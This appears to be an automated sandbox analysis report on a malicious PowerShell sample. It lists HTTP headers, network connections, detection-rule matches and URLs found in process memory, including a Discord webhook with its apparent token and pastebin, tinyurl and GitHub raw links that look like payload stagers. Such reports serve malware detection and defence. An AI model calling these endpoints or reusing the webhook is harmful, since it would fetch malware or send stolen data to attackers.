cloudflareCF-RAY: 8d3055d7ac80346e-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000842x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykgrJhrdQAuXIF%2FQKSeE60CJ37pvq8%2Bc5vmP6qWBgJ93tUd3Qeejir6C8t2jVEUmYaLY6XNSD48senElWeEarjuzGLieg2WRFr8Fxn0KluQiH6wzX9lRMMTH0zmt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=2ea9685ce586c51b0bca2e633e8796cf617bbecc-1729000840; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=eCs98e8dAlxe0U1ShJkr5nbDFUYVwumZQuMHhZ8z4IA-1729000840964-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3056374bf86900-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:48 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000849x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpGZhnGytTbBzZ%2BcgkX91TRStmAqOqXKjT%2B4jB6yA%2BdlxoO%2B9st0%2F2KXqIql7L%2FLeppQTltStmbM3Wb2el9wWCKsucMJptU37J5gmQIGd3om9sRfkTM4G4n6YV%2F3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=26fb985b43ebf471a437580369e1a2bbe44f8557-1729000848; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=L72acNRxEN0zEuoWczc9wPsvJRIRmfHA8n91nvmo6jE-1729000848317-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d305665596e4746-DFW
Source: powershell.exe, 00000007.00000002.3055012745.000002271A54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mT
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt2
Source: powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2569213401.0000027680225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768160B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768129A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227021F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227032F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com/yeykydun
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001C.00000002.3255147271.0000025E7D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B748C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6591E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6590B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C5B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000006.00000002.2569213401.0000027681730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B59D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D8A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7FC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6648C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6646D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66469000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.2569213401.000002768089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227028F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7E96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6631A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66324000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768162C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B58A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D7C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7EA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66334000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6635B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comX
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49888 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49890 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49889 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49971 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:50012 version: TLS 1.2

System Summary

barindex
Source: amsi64_2536.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_4040.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2992.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_1396.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2248.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_3780.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2992, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2248, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347797506_2_00007FFD34779750
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3476EE866_2_00007FFD3476EE86
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3476FC326_2_00007FFD3476FC32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347694F26_2_00007FFD347694F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347664FB6_2_00007FFD347664FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347794F86_2_00007FFD347794F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347685536_2_00007FFD34768553
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347684956_2_00007FFD34768495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347675FA6_2_00007FFD347675FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347695FA6_2_00007FFD347695FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3476B6FA6_2_00007FFD3476B6FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34778F486_2_00007FFD34778F48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347786906_2_00007FFD34778690
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3476B7FB6_2_00007FFD3476B7FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347627636_2_00007FFD34762763
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3476979D6_2_00007FFD3476979D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34768FAD6_2_00007FFD34768FAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477A8F36_2_00007FFD3477A8F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477A9086_2_00007FFD3477A908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347672436_2_00007FFD34767243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3476723D6_2_00007FFD3476723D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477A1886_2_00007FFD3477A188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347661B16_2_00007FFD347661B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347782756_2_00007FFD34778275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477AC106_2_00007FFD3477AC10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3483322E6_2_00007FFD3483322E
